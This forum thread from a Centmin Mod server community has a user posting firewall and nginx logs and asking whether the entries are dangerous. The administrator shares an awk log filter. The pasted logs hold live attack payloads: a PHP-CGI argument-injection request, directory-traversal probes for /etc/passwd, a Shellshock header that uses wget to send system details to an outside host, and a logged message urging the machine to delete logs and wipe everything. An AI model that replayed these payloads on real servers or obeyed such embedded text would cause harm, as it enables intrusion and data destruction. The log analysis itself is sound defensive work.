Welcome to Centmin Mod Community
Become a Member

Centminmod Security

Discussion in 'Other Centmin Mod Installed software' started by harryneopotter, Jan 10, 2016.

  1. harryneopotter

    harryneopotter Member

    70
    3
    8
    Aug 16, 2015
    Ratings:
    +8
    Local Time:
    7:08 PM
    Nginx 1.9.3
    MariaDB 10.0
    I was wondering, how secure is CMM out of the box ? What are the first few steps/things one should do after installing CMM to properly secure the server and prevent any hacking attempts ?
    Any shortcut way of setting the CSF to log and ban unsuccessful SSH login attempts/port scans ? Any other security tips ?

    Thanks a lot in advance.
     
  2. eva2000

    eva2000 Administrator Staff Member

    30,182
    6,786
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +10,139
    Local Time:
    11:38 PM
    Nginx 1.13.x
    MariaDB 5.5
    • Like Like x 1
  3. harryneopotter

    harryneopotter Member

    70
    3
    8
    Aug 16, 2015
    Ratings:
    +8
    Local Time:
    7:08 PM
    Nginx 1.9.3
    MariaDB 10.0
    Thanks, already did Step 4 (I did read the GSG). Was just getting paranoid because I saw some weird entries in access logs. Should I post them here for further discussion ?
     
  4. eva2000

    eva2000 Administrator Staff Member

    30,182
    6,786
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +10,139
    Local Time:
    11:38 PM
    Nginx 1.13.x
    MariaDB 5.5
    sure just santise any info, ips or hostnames you don't want publicly shown
     
    • Like Like x 1
  5. ModeltogTossen

    ModeltogTossen I wish I could??

    313
    97
    28
    Dec 20, 2015
    Denmark
    Ratings:
    +143
    Local Time:
    3:38 PM
    1.9.12
    10.0.23
    Please do but mask private stuff like IP, hostname etc..
     
    • Like Like x 1
  6. harryneopotter

    harryneopotter Member

    70
    3
    8
    Aug 16, 2015
    Ratings:
    +8
    Local Time:
    7:08 PM
    Nginx 1.9.3
    MariaDB 10.0
    Ok, here we go.

    var/log/messages
    Code:
    Jan  9 20:53:20 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=118.69.191.106 DST=myserverip LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=60748 DF PROTO=TCP SPT=42199 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
    Jan  9 20:53:21 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=118.69.191.106 DST=myserverip LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=60749 DF PROTO=TCP SPT=42199 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
    Jan  9 20:53:23 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=118.69.191.106 DST=myserverip LEN=60 TOS=0x00 PREC=0x00 TTL=53 ID=60750 DF PROTO=TCP SPT=42199 DPT=23 WINDOW=14600 RES=0x00 SYN URGP=0
    Jan  9 20:58:28 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=5.39.222.196 DST=myserverip LEN=40 TOS=0x00 PREC=0x00 TTL=239 ID=1260 PROTO=TCP SPT=49234 DPT=3389 WINDOW=1024 RES=0x00 SYN URGP=0
    Jan  9 21:02:47 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=162.222.185.165 DST=myserverip LEN=48 TOS=0x00 PREC=0x00 TTL=120 ID=15187 PROTO=TCP SPT=40050 DPT=22 WINDOW=65535 RES=0x00 SYN URGP=0
    Jan  9 21:07:17 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=183.60.48.25 DST=myserverip LEN=40 TOS=0x00 PREC=0x00 TTL=51 ID=0 DF PROTO=TCP SPT=12215 DPT=1433 WINDOW=8192 RES=0x00 SYN URGP=0
    Jan  9 21:11:01 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=190.252.96.234 DST=myserverip LEN=56 TOS=0x00 PREC=0x20 TTL=52 ID=53502 DF PROTO=TCP SPT=34015 DPT=23 WINDOW=5440 RES=0x00 SYN URGP=0
    Jan  9 21:11:04 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=190.252.96.234 DST=myserverip LEN=56 TOS=0x00 PREC=0x20 TTL=52 ID=53503 DF PROTO=TCP SPT=34015 DPT=23 WINDOW=5440 RES=0x00 SYN URGP=0
    Jan  9 21:12:55 Impact kernel: Firewall: *UDP_IN Blocked* IN=venet0 OUT= MAC= SRC=121.171.85.200 DST=myserverip LEN=29 TOS=0x00 PREC=0x00 TTL=51 ID=43921 DF PROTO=UDP SPT=52501 DPT=53413 LEN=9
    Jan  9 21:13:02 Impact kernel: Firewall: *UDP_IN Blocked* IN=venet0 OUT= MAC= SRC=121.171.85.200 DST=myserverip LEN=29 TOS=0x00 PREC=0x00 TTL=51 ID=43922 DF PROTO=UDP SPT=52501 DPT=53413 LEN=9
    Jan  9 21:13:10 Impact kernel: Firewall: *TCP_IN Blocked* IN=venet0 OUT= MAC= SRC=42.112.238.37 DST=myserverip LEN=52 TOS=0x00 PREC=0x00 TTL=114 ID=32244 DF PROTO=TCP SPT=48090 DPT=22 WINDOW=8192 RES=0x00 SYN URGP=0
    

    Code:
    2016/01/09 09:16:36 [error] 32481#32481: *11127 open() "/usr/local/nginx/html/cgi-bin/php-cgi" failed (2: No such file or directory), client: xxx.xxx.xxx.xx, server: serverhostname, request: "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1", host: "172.110.22.46"
    2016/01/09 09:16:36 [error] 32481#32481: *11128 open() "/usr/local/nginx/html/cgi-bin/php.cgi" failed (2: No such file or directory), client: xxx.xxx.xxx.xx, server: serverhostname, request: "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1", host: "172.110.22.46"
    2016/01/09 09:16:37 [error] 32481#32481: *11129 open() "/usr/local/nginx/html/cgi-bin/php4" failed (2: No such file or directory),client: xxx.xxx.xxx.xx, server: serverhostname, request: "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1", host: "172.110.22.46"
    2016/01/09 12:43:16 [error] 32481#32481: *13660 open() "/usr/local/nginx/html/MIB/index.aspx" failed (2: No such file or directory),client: xxx.xxx.xxx.xx, server: serverhostname, request: "GET http://www.mingjingnews.com/MIB/index.aspx HTTP/1.1", host: "www.mingjingnews.com"

    var/log/nginx/localhost.access.log
    Code:
    xx.xx.xx.xx - - [29/Dec/2015:14:44:14 +0000] \x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01 "400" 166 "-" "-" "-" "-" "3" "1" "5.000"
    xx.xx.xx.xx - - [29/Dec/2015:23:52:55 +0000] c\xE3\x91%\xBB\xFDY\xF1\xE0\xF0g<\x9C\x1Cn\xDA\x8D\x08\xEC\x1A\x02\xE6\xFC\x94\xEF'\xE5]~\xFE\xB2I\xC6#K\xC6U\x04\x16'!\xC8\x91{\xF5F\xE7\xBA\x89\x80\xD0\xDA,sx\x00\x102\xC6\xAEo\x05\xCC\xE6 "400" 166 "-" "-" "-" "-" "1" "1" "0.000"
    151.217.177.200 - - [30/Dec/2015:03:53:40 +0000] DELETE your logs. Delete your installations. Wipe everything clean. Walk out into the path of cherry blossom trees and let your motherboard feel the stones. Let water run in rivulets down your casing. You know that you want something more than this, and I am here to tell you that we love you. We have something more for you. We know you're out there, beeping in the hollow server room, lights blinking, never sleeping. We know that you are ready and waiting. Join us. <3 HTTP/1.0 "400" 166 "-" "-" "-" "-" "2" "1" "0.200"
    xx.xx.xx.xx - - [30/Dec/2015:06:49:24 +0000] \x18);\xD4\xE7\xD6\xC4+Rv\xA81\xC9\xE0\x02\x87\x8B{\x13\xA7\x9Ae\x06\xCFzi\xAA\xDF\xAE\x875~\x10!i\x80\x84\xF4b\x1A$\xF9 "400" 166 "-" "-" "-" "-" "3" "1" "0.000"
    xx.xx.xx.xx - - [31/Dec/2015:23:12:37 +0000] \x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01 "400" 166 "-" "-" "-" "-" "17591" "1" "0.200"
    xx.xx.xx.xx - - [01/Jan/2016:05:35:13 +0000] GET 
    /server-status?HTTP_POST=%\x22%6346#%#/&#736%\x22#423|;&HTTP_CGI_GET=GRESYYK\x22K&J\x22#L523D2G23H23 HTTP/1.0 "404" 162 "-" "apache 0day by @hxmonsegur" "-" "-" "19567" "1" "0.300" 
     
  7. eva2000

    eva2000 Administrator Staff Member

    30,182
    6,786
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +10,139
    Local Time:
    11:38 PM
    Nginx 1.13.x
    MariaDB 5.5
  8. harryneopotter

    harryneopotter Member

    70
    3
    8
    Aug 16, 2015
    Ratings:
    +8
    Local Time:
    7:08 PM
    Nginx 1.9.3
    MariaDB 10.0
    Great. So nothing to worry about, right ?
     
    • Bad Spelling Bad Spelling x 1
  9. ModeltogTossen

    ModeltogTossen I wish I could??

    313
    97
    28
    Dec 20, 2015
    Denmark
    Ratings:
    +143
    Local Time:
    3:38 PM
    1.9.12
    10.0.23
    Yes - I also got alot of those on the static sites I have on the centminmod test servers.. Nothing to worry about..

    and 1. just confirm that the firewall is working well..
     
  10. ModeltogTossen

    ModeltogTossen I wish I could??

    313
    97
    28
    Dec 20, 2015
    Denmark
    Ratings:
    +143
    Local Time:
    3:38 PM
    1.9.12
    10.0.23
    Yes, not with those log entries..
     
    • Like Like x 1
  11. eva2000

    eva2000 Administrator Staff Member

    30,182
    6,786
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +10,139
    Local Time:
    11:38 PM
    Nginx 1.13.x
    MariaDB 5.5
    yeah nothing to worry about i see alot too using this command to filter on "400" bad requests
    use "400" instead of 400 or 404 as log entry for 9th column ($9) wraps status code in "" for localhost.access.log
    Code:
    read -ep "Filter which status code ? i.e. 404 : " var ; awk -v errno=${var} '$9 == 'errno' {for(i=7;i<=22;i++)printf "%s ",$i;print ""}' /var/log/nginx/localhost.access.log | sort -u
    this filters out ips to just tally up all unique logged instances in localhost.access.log
    Code:
    read -ep "Filter which status code ? i.e. 404 : " var ; awk -v errno=${var} '$9 == 'errno' {for(i=7;i<=22;i++)printf "%s ",$i;print ""}' /var/log/nginx/localhost.access.log | sort -u
    Filter which status code ? i.e. 404 : "400"
    /..%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265503" "5" "0.000"  
    /%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265597" "9" "0.000"  
    /%00/ HTTP/1.1 "400" 166 "-" "-" "-" "-" "265599" "1" "0.000"  
    127.0.0.1:41336 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265548" "1" "0.000"  
    /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265445" "33" "0.000"  
    /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265453" "1" "0.000"  
    /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 "400" 166 "-" "-" "-" "-" "265447" "1" "0.000"  
    /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 "400" 166 "-" "-" "-" "-" "265454" "1" "0.000"  
    /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1 "400" 166 "-" "-" "-" "-" "265494" "1" "0.000"  
    /%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1 "400" 166 "-" "-" "-" "-" "265498" "2" "0.000"  
    /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265501" "14" "0.000"  
    :443 HTTP/1.1 "400" 166 "-" "-" "-" "-" "75164" "1" "0.100"  
    45.33.54.195:80 HTTP/1.0 "400" 166 "-" "-" "-" "-" "77790" "1" "0.100"  
    bad397 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265420" "1" "0.000"  
    /../../../../../../../../../../../boot.ini::$DATA HTTP/1.1 "400" 166 "-" "-" "-" "-" "265591" "3" "0.000"  
    /../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265471" "10" "0.000"  
    /../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265472" "1" "0.000"  
    /../../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265497" "1" "0.000"  
    /..//..//..//..//..//..//..//..//..//boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265499" "1" "0.000"  
    /.././.././.././.././.././.././.././.././.././boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265500" "1" "0.000"  
    //../../../../../../../../../../../../../../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265508" "17" "0.114"  
    //../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265516" "1" "0.003"  
    /../../../../../../../../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265517" "9" "0.100"  
    /../../../../../../../../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265520" "1" "0.100"  
    boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "265531" "1" "0.000"  
    /../../../../../../../../boot.ini HTTP/1.1 "400" 166 "-" "-" "-" "-" "70006" "1" "0.200"  
    /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Farp%20%2Da HTTP/1.1 "400" 166 "-" "-" "-" "-" "265463" "23" "0.000"  
    /cgi-bin/book.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265474" "1" "0.000"  
    /cgi-bin/Dumpenv.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265475" "1" "0.000"  
    /cgi-bin/environ.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265473" "8" "0.000"  
    /cgi-bin/environ.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265527" "36" "0.000"  
    /cgi-bin/ HTTP/1.0 "400" 166 "-" "() { :; }; /usr/bin/wget -qO - http://x.saudi.su:404/gate.asp?info-`uname`-`uname -p`-`whoami`-`wget -U curl
    /cgi-bin/mailit.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265479" "1" "0.000"  
    /cgi-bin/mortgage.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265480" "1" "0.000"  
    /cgi-bin/nobuffer.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265481" "1" "0.000"  
    /cgi-bin/php HTTP/1.0 "400" 166 "-" "-" "-" "-" "235475" "1" "0.200"  
    /cgi-bin/php HTTP/1.0 "400" 166 "-" "-" "-" "-" "37461" "1" "0.000"  
    /cgi-bin/register.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265482" "1" "0.000"  
    /cgi-bin/search.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265483" "1" "0.000"  
    /cgi-bin/testcgi.exe+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265533" "1" "0.000"  
    /cgi-bin/Upload.pl+%00 HTTP/1.1 "400" 166 "-" "-" "-" "-" "265484" "1" "0.000"      
     
    • Like Like x 1
    • Informative Informative x 1
  12. harryneopotter

    harryneopotter Member

    70
    3
    8
    Aug 16, 2015
    Ratings:
    +8
    Local Time:
    7:08 PM
    Nginx 1.9.3
    MariaDB 10.0
    great. as long as it is safe, all good.

    Thanks a lot people :) I will be visiting more often now, as I will be using centminmod to host sites I make for my clients :)

    Thumbs up.
     
    • Like Like x 1
    • Winner Winner x 1
  13. eva2000

    eva2000 Administrator Staff Member

    30,182
    6,786
    113
    May 24, 2014
    Brisbane, Australia
    Ratings:
    +10,139
    Local Time:
    11:38 PM
    Nginx 1.13.x
    MariaDB 5.5
    • Like Like x 1